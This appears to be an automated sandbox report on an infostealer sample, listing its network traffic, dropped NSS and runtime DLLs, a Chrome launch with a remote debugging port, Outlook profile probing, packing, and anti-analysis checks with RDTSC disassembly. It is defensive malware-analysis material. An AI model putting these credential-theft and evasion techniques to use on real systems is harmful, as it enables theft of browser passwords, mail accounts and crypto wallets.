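Residues are worth keeping rather than discarding: "exodus.conf.jsonni" after the gate URL is a piece of the wallet-harvesting string table that happened to follow it in memory, which is context an analyst wants to see next to the IOC.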
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
               Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49680 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
               Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
               Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
               Source: unknown | HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
               Source: test.exe | Static PE information: section name:
               Source: test.exe | Static PE information: section name: .idata
               Source: test.exe | Static PE information: section name:
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CD1B700
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B8C0 rand_s,NtQueryVirtualMemory,0_2_6CD1B8C0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6CD1B910
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6CCBF280
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB35A00_2_6CCB35A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC64C00_2_6CCC64C0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDD4D00_2_6CCDD4D0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBD4E00_2_6CCBD4E0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF6CF00_2_6CCF6CF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC6C800_2_6CCC6C80
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD134A00_2_6CD134A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1C4A00_2_6CD1C4A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC54400_2_6CCC5440
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2545C0_2_6CD2545C
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD02C100_2_6CD02C10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2AC000_2_6CD2AC00
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF5C100_2_6CCF5C10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD2542B0_2_6CD2542B
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF0DD00_2_6CCF0DD0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD185F00_2_6CD185F0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCFD000_2_6CCCFD00
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE05120_2_6CCE0512
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCDED100_2_6CCDED10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD276E30_2_6CD276E3
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBBEF00_2_6CCBBEF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCFEF00_2_6CCCFEF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD1E6800_2_6CD1E680
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD5E900_2_6CCD5E90
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD14EA00_2_6CD14EA0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD46400_2_6CCD4640
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCD9E500_2_6CCD9E50
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD02E4E0_2_6CD02E4E
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF3E500_2_6CCF3E50
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD26E630_2_6CD26E63
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBC6700_2_6CCBC670
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD056000_2_6CD05600
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCF7E100_2_6CCF7E10
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD19E300_2_6CD19E30
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCBDFE00_2_6CCBDFE0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCE6FF00_2_6CCE6FF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD077A00_2_6CD077A0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC9F000_2_6CCC9F00
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCF7710
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD250C7
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCDC0E0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCF58E0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCE60A0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCD8850
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCDD850
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCFF070
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCC7810
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCFB820
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD04820
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD12990
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCF5190
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCBC9A0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCED9B0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCDA940
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD0B970
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD2B170
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCCD960
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCF8AC0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCD1AF0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCFE2F0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD2BA90
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD22AB0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCB22A0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCE4AA0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCCCAB0
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCF9A60
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD253C8
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCBF380
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCB5340
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCCC370
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCFD320
              Source: C:\Users\user\Desktop\test.exe | Code function: String function: 6CCECBE8 appears 134 times
              Source: C:\Users\user\Desktop\test.exe | Code function: String function: 6CCF94D0 appears 90 times
              Source: test.exe, 00000000.00000002.1471290644.000000006CF35000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs test.exe
              Source: test.exe, 00000000.00000002.1471017384.000000006CD42000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs test.exe
              Source: test.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: test.exe | Static PE information: Section: rygczwdk ZLIB complexity 0.9948654407834453
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/28@2/4
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\8WZQH9L4.htm
              Source: C:\Users\user\Desktop\test.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: test.exe, 00000000.00000003.1342784645.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, IJKFCFHJDBKKFHIEHIDG.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: test.exe, 00000000.00000002.1459721686.0000000005EE9000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1470753159.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: test.exe | ReversingLabs: Detection: 60%
              Source: test.exe | Virustotal: Detection: 64%
              Source: test.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknown | Process created: C:\Users\user\Desktop\test.exe "C:\Users\user\Desktop\test.exe"
              Source: C:\Users\user\Desktop\test.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,7698725374925482900,7061072673800453571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2320 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
              Source: C:\Users\user\Desktop\test.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: rstrtmgr.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: mozglue.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\test.exe | Section loaded: msvcp140.dll
              Source: C:\Users\user\Desktop\test.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\test.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
              Source: test.exe | Static file information: File size 1784320 > 1048576
              Source: test.exe | Static PE information: Raw size of rygczwdk is bigger than: 0x100000 < 0x199400
              Source: Binary string: mozglue.pdbP source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

              Data Obfuscation

              Source: C:\Users\user\Desktop\test.exe | Unpacked PE file: 0.2.test.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rygczwdk:EW;wsyxmuzr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rygczwdk:EW;wsyxmuzr:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCB3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime
              Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
              Source: test.exe | Static PE information: real checksum: 0x1c3886 should be: 0x1c3647
              Source: test.exe | Static PE information: section name:
              Source: test.exe | Static PE information: section name: .idata
              Source: test.exe | Static PE information: section name:
              Source: test.exe | Static PE information: section name: rygczwdk
              Source: test.exe | Static PE information: section name: wsyxmuzr
              Source: test.exe | Static PE information: section name: .taggant
              Source: freebl3.dll.0.dr | Static PE information: section name: .00cfg
              Source: freebl3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue.dll.0.dr | Static PE information: section name: .00cfg
              Source: mozglue[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: msvcp140.dll.0.dr | Static PE information: section name: .didat
              Source: msvcp140[1].dll.0.dr | Static PE information: section name: .didat
              Source: nss3.dll.0.dr | Static PE information: section name: .00cfg
              Source: nss3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3.dll.0.dr | Static PE information: section name: .00cfg
              Source: softokn3[1].dll.0.dr | Static PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCEB536 push ecx; ret 0_2_6CCEB549
              Source: test.exe | Static PE information: section name: rygczwdk entropy: 7.954237174992683
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\mozglue.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\nss3.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\msvcp140.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\freebl3.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\vcruntime140.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\ProgramData\softokn3.dll
              Source: C:\Users\user\Desktop\test.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

              Boot Survival

              Source: C:\Users\user\Desktop\test.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\test.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\test.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\test.exe | Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\test.exe | Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CD155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\test.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\test.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: D00291 second address: D00297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: D00297 second address: D0029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: D0029B second address: D002C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F403C75C8FDh 0x00000011 jmp 00007F403C75C8FFh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: D002C4 second address: CFFB02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a sub esi, dword ptr [ebp+122D372Eh] 0x00000010 mov ecx, esi 0x00000012 popad 0x00000013 push dword ptr [ebp+122D0E95h] 0x00000019 sub dword ptr [ebp+122D30A0h], esi 0x0000001f call dword ptr [ebp+122D1E95h] 0x00000025 pushad 0x00000026 xor dword ptr [ebp+122D1D84h], ecx 0x0000002c xor eax, eax 0x0000002e cmc 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 mov dword ptr [ebp+122D2A36h], edx 0x00000039 mov dword ptr [ebp+122D3716h], eax 0x0000003f pushad 0x00000040 xor dword ptr [ebp+122D2A36h], edx 0x00000046 sub ecx, dword ptr [ebp+122D3786h] 0x0000004c popad 0x0000004d mov esi, 0000003Ch 0x00000052 mov dword ptr [ebp+122D1D84h], edi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c jnl 00007F403D12A5C4h 0x00000062 lodsw 0x00000064 pushad 0x00000065 jmp 00007F403D12A5C2h 0x0000006a xor dword ptr [ebp+122D2A36h], edx 0x00000070 popad 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 jmp 00007F403D12A5C8h 0x0000007b je 00007F403D12A5BCh 0x00000081 mov dword ptr [ebp+122D2A36h], esi 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c clc 0x0000008d push eax 0x0000008e push esi 0x0000008f push eax 0x00000090 push edx 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: CFFB02 second address: CFFB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E6B73A second address: E6B740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E6B740 second address: E6B749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exe | RDTSC instruction interceptor: First address: E6B749 second address: E6B75A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
